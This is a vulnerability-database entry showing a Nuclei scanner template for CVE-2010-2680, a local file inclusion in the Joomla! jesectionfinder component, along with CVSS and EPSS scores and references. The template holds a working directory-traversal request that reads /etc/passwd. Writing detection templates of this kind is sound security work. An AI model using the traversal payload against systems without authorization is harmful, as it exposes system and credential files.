Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
nucleiProjectDiscoveryNUCLEI:CVE-2010-2680
HistorySep 27, 2021 - 11:02 a.m.

Joomla! Component jesectionfinder - Local File Inclusion

2021-09-2711:02:48
ProjectDiscovery
github.com
9
cve2010
joomla
lfi
exploitdb
packetstorm
harmistechnology

CVSS2

6.8

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

AI Score

7.1

Confidence

High

EPSS

0.008

Percentile

82.0%

JSON

A directory traversal vulnerability in the JExtensions JE Section/Property Finder (jesectionfinder) component for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the view parameter to index.php.

id: CVE-2010-2680

info:
  name: Joomla! Component jesectionfinder - Local File Inclusion
  author: daffainfo
  severity: medium
  description: A directory traversal vulnerability in the JExtensions JE Section/Property Finder (jesectionfinder) component for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the view parameter to index.php.
  remediation: Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/14064
    - https://nvd.nist.gov/vuln/detail/CVE-2010-2680
    - http://packetstormsecurity.org/1006-exploits/joomlajesectionfinder-lfi.txt
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/59796
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P
    cvss-score: 6.8
    cve-id: CVE-2010-2680
    cwe-id: CWE-22
    epss-score: 0.00826
    epss-percentile: 0.8192
    cpe: cpe:2.3:a:harmistechnology:com_jesectionfinder:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: harmistechnology
    product: com_jesectionfinder
  tags: cve2010,cve,joomla,lfi,edb,packetstorm,harmistechnology

http:
  - method: GET
    path:
      - "{{BaseURL}}/propertyfinder/component/jesectionfinder/?view=../../../../../../../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 490a00463044021f5ffc7d61e608cca2478cc4115fe3177e5ed61660e8e13424a4c772b685bb9402210087feaeec186288bbbc891fdd5dc0ba7612f5cfd614be5ffac00907ff4670c362:922c64590222798bb761d5b6d8e72950

Related

cve 1
prion 1
exploitdb 1
checkpoint_advisories 1
cvelist 1
nvd 1
cve
cve
CVE-2010-2680
2010-07-12 13:27:27
prion
prion
Directory traversal
2010-07-12 13:27:00
exploitdb
exploitdb
Joomla! Component jesectionfinder - Local File Inclusion
2010-06-26 00:00:00
checkpoint_advisories
checkpoint_advisories
Joomla Component JESectionFinder Directory traversal (CVE-2010-2680)
2014-11-10 00:00:00
cvelist
cvelist
CVE-2010-2680
2010-07-09 19:00:00
nvd
nvd
CVE-2010-2680
2010-07-12 13:27:27

CVSS2

6.8

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

AI Score

7.1

Confidence

High

EPSS

0.008

Percentile

82.0%

JSON
Related for NUCLEI:CVE-2010-2680
cve1prion1exploitdb1checkpoint_advisories1cvelist1nvd1